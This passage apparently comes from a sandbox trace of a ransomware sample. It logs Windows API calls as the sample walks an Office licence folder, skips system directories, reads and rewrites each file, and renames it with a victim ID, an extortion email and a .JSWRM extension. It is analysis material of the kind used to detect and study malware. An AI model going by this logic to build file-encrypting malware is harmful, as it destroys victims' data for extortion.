lpDistanceToMoveHigh=0x0) returned 0x0 [0105.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0105.003] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0105.008] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.008] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0105.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.008] CloseHandle (hObject=0x45c) returned 1 [0105.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0105.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0105.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0105.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0105.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0105.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0105.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.009] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial2-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial2-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial2-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0105.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0105.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0105.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.010] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe60a53cf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe60a53cf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6163f9f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2baf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTrial3-pl.xrm-ms", cAlternateFileName="O380E3~1.XRM")) returned 1 [0105.010] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-pl.xrm-ms", lpString2=".") returned 1 [0105.010] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-pl.xrm-ms", lpString2="..") returned 1 [0105.010] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-pl.xrm-ms", lpString2="...") returned 1 [0105.010] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-pl.xrm-ms", lpString2="windows") returned -1 [0105.010] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-pl.xrm-ms", lpString2="recovery") returned -1 [0105.010] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.010] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.010] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.010] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.010] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-pl.xrm-ms", lpString2="msocache") returned 1 [0105.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0105.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial3-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0105.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial3-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0105.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0105.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0105.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial3-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0105.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial3-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0105.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0105.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0105.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0105.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0105.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial3-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.011] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11183) returned 1 [0105.011] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0105.011] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0105.013] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.013] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0105.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.013] CloseHandle (hObject=0x45c) returned 1 [0105.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0105.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0105.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0105.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0105.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0105.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0105.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.014] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial3-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial3-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial3-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0105.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0105.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0105.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.015] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5fe6802, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5fe6802, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe60a53cf, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5a5f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTrial3-ppd.xrm-ms", cAlternateFileName="O3458D~1.XRM")) returned 1 [0105.015] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ppd.xrm-ms", lpString2=".") returned 1 [0105.015] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ppd.xrm-ms", lpString2="..") returned 1 [0105.015] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ppd.xrm-ms", lpString2="...") returned 1 [0105.015] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ppd.xrm-ms", lpString2="windows") returned -1 [0105.015] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.015] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.015] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.015] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.015] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.015] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0105.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial3-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0105.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial3-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0105.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0105.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0105.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial3-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0105.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial3-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0105.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0105.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0105.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0105.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0105.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial3-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.016] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23135) returned 1 [0105.016] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a50) returned 0x24c1d0 [0105.016] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5a50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5a50, lpOverlapped=0x0) returned 1 [0105.019] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.019] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5a50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5a50, lpOverlapped=0x0) returned 1 [0105.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.020] CloseHandle (hObject=0x45c) returned 1 [0105.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0105.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0105.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0105.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0105.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0105.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0105.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.020] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial3-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial3-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial3-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0105.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0105.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0105.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.021] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe60cb644, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe60cb644, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe61b0488, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d73, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTrial3-ul-oob.xrm-ms", cAlternateFileName="O3E705~1.XRM")) returned 1 [0105.021] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.021] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.021] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.021] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.021] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.021] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.021] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.021] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.021] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.021] lstrcmpiW (lpString1="O365HomePremR_SubTrial3-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0105.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial3-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial3-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0105.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0105.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial3-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial3-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0105.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0105.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0105.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", 